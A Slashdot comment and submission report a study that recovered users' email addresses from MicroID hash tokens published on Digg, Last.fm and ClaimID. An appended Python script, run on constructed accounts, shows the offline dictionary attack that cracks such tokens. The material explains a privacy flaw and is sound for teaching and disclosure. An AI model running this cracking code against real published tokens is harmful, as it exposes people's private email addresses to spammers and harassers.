
Comment Re:Flawed study? (Score 1) 155

I address this question in the paper and on the tiny FAQ here. Basically, DHAs require a spammer to interactively query an email server and blindly guess popular names: here, the server can throttle or block access to these requesters, and the success rate is very low.

With MicroID, the tokens are meant for public use, and thus can be accessed with a simple HTTP GET. Cracking them yields much higher success rates (25% from Digg) than DHAs, as well as a "verified" user email, and links to that user's associated content (e.g., favorite Last.fm songs for ringtone spam, favorite Digg articles).

Privacy

Submission + - Hashing email addresses for web considered harmful (brown.edu)

cce writes: The MicroID standard, despite getting thrashed soundly by Ben Laurie two years ago, has since been recommended by the DataPortability Project and published on the user profiles of millions of users at Digg and Last.fm. MicroID is basically a hash calculated using a user's profile page URL and registered email address, producing a token that makes the email address vulnerable to dictionary attacks. To see how easy it was to crack these tokens, I conducted a small study, choosing 56,775 random Digg users, and cracking the email addresses of 14,294 of them (25%) using just their MicroID, username, and a list of popular email domains. Digg has more than 2 million users, and that means half a million of them — mostly people who had never heard of MicroID, and had probably not logged in for a long time — had their email addresses exposed to this trivial attack. I also applied this attack to Last.fm (19%) and ClaimID (34%). Digg and Last.fm have since removed support for MicroID, but the lesson is clear: don't publish a hash of my email address online, guys!
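The attack the submission and the comment above describe, as an added example that is not part of the original post or the study: build MicroID tokens for a few constructed accounts the way a site would publish them, then recover the email behind each token offline from nothing but the token, the username and a short list of popular mail domains. The token construction follows the legacy MicroID scheme as I understand it (SHA-1 over the concatenated hex SHA-1 digests of the "mailto:" identity URI and the profile URL); that formula, the profile URL pattern, the domain list and the username-to-local-part guessing rules are all assumptions for illustration, not taken from the post.

```python
import hashlib
from itertools import product

# Legacy MicroID construction (assumed, per my reading of the spec, not quoted
# from the post): sha1( hex(sha1("mailto:" + email)) + hex(sha1(profile_url)) ).
def microid(email: str, profile_url: str) -> str:
    identity = hashlib.sha1(("mailto:" + email).encode()).hexdigest()
    service = hashlib.sha1(profile_url.encode()).hexdigest()
    return hashlib.sha1((identity + service).encode()).hexdigest()

# Hypothetical profile URL pattern for the site publishing the token.
def profile_url(username: str) -> str:
    return f"http://example-site.invalid/users/{username}"

# Constructed short list of popular mail domains; a real run would use a longer one.
POPULAR_DOMAINS = ["gmail.com", "yahoo.com", "hotmail.com", "aol.com"]

def candidate_local_parts(username: str) -> list:
    """Cheap local-part guesses derived from the public username (assumed rules)."""
    base = username.lower()
    variants = [username, base, base.replace(".", ""),
                base.replace("_", "."), base.replace("-", ".")]
    seen = []
    for v in variants:
        if v and v not in seen:
            seen.append(v)
    return seen

def crack_microid(token: str, username: str, domains=POPULAR_DOMAINS):
    """Return the email whose MicroID matches `token`, or None if no guess hits.

    Every guess is a local SHA-1 computation: no server is contacted, so nothing
    can throttle or block the attacker, unlike a directory harvest attack.
    """
    url = profile_url(username)
    for local, domain in product(candidate_local_parts(username), domains):
        email = f"{local}@{domain}"
        if microid(email, url) == token:
            return email
    return None

def guesses_per_user(username: str, domains=POPULAR_DOMAINS) -> int:
    """How many hashes the attacker computes per user at most."""
    return len(candidate_local_parts(username)) * len(domains)

# Constructed sample accounts: the email is what the site knows privately and
# folds into the public token; it never appears on the profile page itself.
USERS = [
    ("alice_smith", "alice.smith@gmail.com"),
    ("BobJones", "bobjones@yahoo.com"),
    ("carol", "carol@example-corp.internal"),  # domain not in the list: survives
]

def published_tokens(users=USERS) -> dict:
    """What a site would expose: username -> MicroID token."""
    return {u: microid(e, profile_url(u)) for u, e in users}

def crack_all(tokens: dict) -> dict:
    """Attacker side: username -> recovered email (or None)."""
    return {u: crack_microid(t, u) for u, t in tokens.items()}

if __name__ == "__main__":
    results = crack_all(published_tokens())
    for user, email in results.items():
        print(f"{user}: {email or 'not recovered'} "
              f"(at most {guesses_per_user(user)} hashes)")
```

Two of the three constructed users fall to at most a handful of hashes each, which is the whole point: the hash does not hide an input drawn from a small, guessable space, and because the token is public the server never sees the guessing happen.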
